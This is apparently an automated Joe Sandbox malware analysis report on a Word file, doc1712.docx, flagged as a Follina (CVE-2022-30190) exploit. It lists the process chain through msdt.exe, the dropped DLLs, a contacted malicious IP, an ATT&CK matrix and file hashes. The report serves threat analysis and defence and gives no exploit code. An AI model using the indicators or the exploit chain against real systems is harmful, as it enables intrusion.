        Remote System Discovery        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
        Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS2
        File and Directory Discovery        		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets13
        System Information Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 640804 Sample: doc1712.docx Startdate: 07/06/2022 Architecture: WINDOWS Score: 72 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->51 53 2 other signatures 2->53 6 WINWORD.EXE 74 63 2->6         started        10 csc.exe 3 2->10         started        12 csc.exe 3 2->12         started        14 2 other processes 2->14 process3 dnsIp4 45 45.32.185.177, 49754, 49765, 80 AS-CHOOPAUS United States 6->45 33 C:\Users\user\AppData\Local\...\123[1].RES, HTML 6->33 dropped 35 C:\Users\user\AppData\Local\...\7F7F7060.htm, HTML 6->35 dropped 37 C:\Users\user\AppData\Local\...\1FD46902.htm, HTML 6->37 dropped 16 msdt.exe 21 6->16         started        19 MSOSYNC.EXE 5 12 6->19         started        21 MSOSYNC.EXE 2 3 6->21         started        39 C:\Users\user\AppData\Local\...\ddzr0cba.dll, PE32 10->39 dropped 23 cvtres.exe 1 10->23         started        41 C:\Users\user\AppData\Local\...\qe5jzpda.dll, PE32 12->41 dropped 25 cvtres.exe 1 12->25         started        43 C:\Users\user\AppData\Local\...\xwo13jpt.dll, PE32 14->43 dropped 27 cvtres.exe 1 14->27         started        file5 process6 file7 29 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 16->29 dropped 31 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 16->31 dropped

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        doc1712.docx23%VirustotalBrowse
        doc1712.docx11%MetadefenderBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dll0%MetadefenderBrowse
        C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dll0%ReversingLabs
        C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
        C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\DiagPackage.dll.mui0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://roaming.edog.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://api.aadrm.com0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe
        https://dataservice.o365filtering.com0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://api.diagnosticssdf.office.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
          		high
          https://login.microsoftonline.com/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
            		high
            https://shell.suite.office.com:14439E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
              		high
              https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                		high
                https://autodiscover-s.outlook.com/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                  		high
                  https://roaming.edog.9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                    		high
                    https://cdn.entity.9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.addins.omex.office.net/appinfo/query9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                      		high
                      https://clients.config.office.net/user/v1.0/tenantassociationkey9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                        		high
                        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                          		high
                          https://powerlift.acompli.net9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://rpsticket.partnerservices.getmicrosoftkey.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://lookup.onenote.com/lookup/geolocation/v19E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                            		high
                            https://cortana.ai9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                              		high
                              https://cloudfiles.onenote.com/upload.aspx9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                		high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                  		high
                                  https://entitlement.diagnosticssdf.office.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                    		high
                                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                      		high
                                      https://api.aadrm.com/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://ofcrecsvcapi-int.azurewebsites.net/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                        		high
                                        https://api.microsoftstream.com/api/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                          		high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                            		high
                                            https://cr.office.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                              		high
                                              https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              https://portal.office.com/account/?ref=ClientMeControl9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                		high
                                                https://graph.ppe.windows.net9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                  		high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://powerlift-frontdesk.acompli.net9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                    		high
                                                    https://officeci.azurewebsites.net/api/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                      		high
                                                      https://store.office.cn/addinstemplate9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.aadrm.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                        		high
                                                        https://globaldisco.crm.dynamics.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                          		high
                                                          https://messaging.engagement.office.com/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                            		high
                                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                              		high
                                                              https://dev0-api.acompli.net/autodetect9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.odwebp.svc.ms9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://api.diagnosticssdf.office.com/v2/feedback9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                		high
                                                                https://api.powerbi.com/v1.0/myorg/groups9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                  		high
                                                                  https://web.microsoftstream.com/video/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                    		high
                                                                    https://api.addins.store.officeppe.com/addinstemplate9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://graph.windows.net9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                      		high
                                                                      https://dataservice.o365filtering.com/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://officesetup.getmicrosoftkey.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://analysis.windows.net/powerbi/api9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                        		high
                                                                        https://prod-global-autodetect.acompli.net/autodetect9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://outlook.office365.com/autodiscover/autodiscover.json9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                          		high
                                                                          https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                            		high
                                                                            https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                              		high
                                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                		high
                                                                                https://ncus.contentsync.9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                  		high
                                                                                  https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                    		high
                                                                                    http://weather.service.msn.com/data.aspx9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                      		high
                                                                                      https://apis.live.net/v5.0/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                        		high
                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                          		high
                                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                            		high
                                                                                            https://management.azure.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                              		high
                                                                                              https://outlook.office365.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                		high
                                                                                                https://wus2.contentsync.9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://incidents.diagnostics.office.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                  		high
                                                                                                  https://clients.config.office.net/user/v1.0/ios9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                    		high
                                                                                                    https://insertmedia.bing.office.net/odc/insertmedia9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                      		high
                                                                                                      https://o365auditrealtimeingestion.manage.office.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                        		high
                                                                                                        https://outlook.office365.com/api/v1.0/me/Activities9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                          		high
                                                                                                          https://api.office.net9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                            		high
                                                                                                            https://incidents.diagnosticssdf.office.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                              		high
                                                                                                              https://asgsmsproxyapi.azurewebsites.net/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://clients.config.office.net/user/v1.0/android/policies9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                		high
                                                                                                                https://entitlement.diagnostics.office.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                  		high
                                                                                                                  https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                    		high
                                                                                                                    https://substrate.office.com/search/api/v2/init9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                      		high
                                                                                                                      https://outlook.office.com/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                        		high
                                                                                                                        https://storage.live.com/clientlogs/uploadlocation9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                          		high
                                                                                                                          https://outlook.office365.com/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                            		high
                                                                                                                            https://webshell.suite.office.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                              		high
                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                		high
                                                                                                                                https://substrate.office.com/search/api/v1/SearchHistory9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://management.azure.com/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://clients.config.office.net/c2r/v1.0/InteractiveInstallation9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://login.windows.net/common/oauth2/authorize9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://graph.windows.net/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://api.powerbi.com/beta/myorg/imports9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://devnull.onenote.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://ncus.pagecontentsync.9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://messaging.office.com/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://augloop.office.com/v29E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://skyapi.live.net/Activity/9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://clients.config.office.net/user/v1.0/mac9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://dataservice.o365filtering.com9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown

                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                          Public IPs

                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                          45.32.185.177
                                                                                                                                                          		unknownUnited States
                                                                                                                                                          		20473AS-CHOOPAUStrue

                                                                                                                                                          General Information

                                                                                                                                                          Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                          Analysis ID:640804
                                                                                                                                                          Start date and time: 07/06/202217:38:362022-06-07 17:38:36 +02:00
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 7m 59s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Sample file name:doc1712.docx
                                                                                                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                          Run name:Potential for more IOCs and behavior
                                                                                                                                                          Number of analysed new started processes analysed:32
                                                                                                                                                          Number of new started drivers analysed:1
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal72.expl.evad.winDOCX@17/32@0/1
                                                                                                                                                          EGA Information:Failed
                                                                                                                                                          HDC Information:Failed
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 0
                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .docx
                                                                                                                                                          • Adjust boot time
                                                                                                                                                          • Enable AMSI
                                                                                                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                          • Attach to Office via COM
                                                                                                                                                          • Scroll down
                                                                                                                                                          • Close Viewer

                                                                                                                                                          Warnings

                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.88.37, 52.109.12.21, 52.109.76.33, 52.109.88.39, 52.109.12.23
                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, store-images.s-microsoft.com, login.live.com, als-online.org, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          No simulations

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          45.32.185.177doc1712.docxGet hashmaliciousBrowse

                                                                                                                                                            Domains

                                                                                                                                                            No context

                                                                                                                                                            ASNs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            AS-CHOOPAUSV7crqFDfGzGet hashmaliciousBrowse
                                                                                                                                                            • 44.168.169.116
                                                                                                                                                            doc1712.docxGet hashmaliciousBrowse
                                                                                                                                                            • 45.32.185.177
                                                                                                                                                            Rechnungs-Details.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            2022-06-06_0952.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            5W7po4UYqL.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            njeDT3V9p7.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            ki25afhS4E.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            W5trAFh08y.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            9OPQr4rhqD.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            yfaiqQneQ2.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            8KhF3IfznX.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            ScKZlpWYdS.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            9OPQr4rhqD.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            tY0zfRmSRS.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            L6fx4ToLni.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            LmrrOI.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            pxcCHjhf2y.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            ErFwhF10ZN.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            oYVKIInuqU.dllGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120
                                                                                                                                                            RechnungScan_2022_06_9523033179.xlsGet hashmaliciousBrowse
                                                                                                                                                            • 103.43.75.120

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            No context

                                                                                                                                                            Dropped Files

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dllR346ltaP9w.rtfGet hashmaliciousBrowse
                                                                                                                                                              VIP Invitation to Doha Expo 2023.docxGet hashmaliciousBrowse
                                                                                                                                                                WykHEO9BQN.rtfGet hashmaliciousBrowse
                                                                                                                                                                  lol666 (2).batGet hashmaliciousBrowse
                                                                                                                                                                    EISPv0c56U.docGet hashmaliciousBrowse
                                                                                                                                                                      mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                                        mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                                          05-2022-0438.docGet hashmaliciousBrowse

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:Microsoft Access Database
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):528384
                                                                                                                                                                            Entropy (8bit):0.47595568823682505
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:UGfXMHJC6U8SFBfZ0jGB/AA0P5W8wtZ1Iw+hVZO4Fg:ffX0CxHFZdAvPI8/7I
                                                                                                                                                                            MD5:4ECC580D048E8C68E78F7DA0E417B6DB
                                                                                                                                                                            SHA1:95C378C97B039A0F5DDDB7A2F8577D38D36F6813
                                                                                                                                                                            SHA-256:17C979A2C5C303EA177312CC2988C96C95F5BDE8EE5FFAA5B55FDD4796D0EA56
                                                                                                                                                                            SHA-512:948B26A4DFAE242593C8E51A0DB68ACF8B8E493BD7A6FCF80CFBA62F0C2D476B9E9AF0990DF5B10EFA7784F69E6ED172BC0152C0921FEAFFFCFA9433F70F7B58
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N)U.7...i.(...`.:{6Z...Z.C`..3..y[=.|*..|......%V...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):36
                                                                                                                                                                            Entropy (8bit):2.730660070105504
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                            MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                            SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                            SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                            SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                            Malicious:false
